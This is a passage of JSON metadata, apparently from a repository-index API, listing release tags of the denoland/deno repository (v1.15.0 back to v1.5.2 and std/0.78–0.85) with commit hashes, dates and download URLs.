s://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","k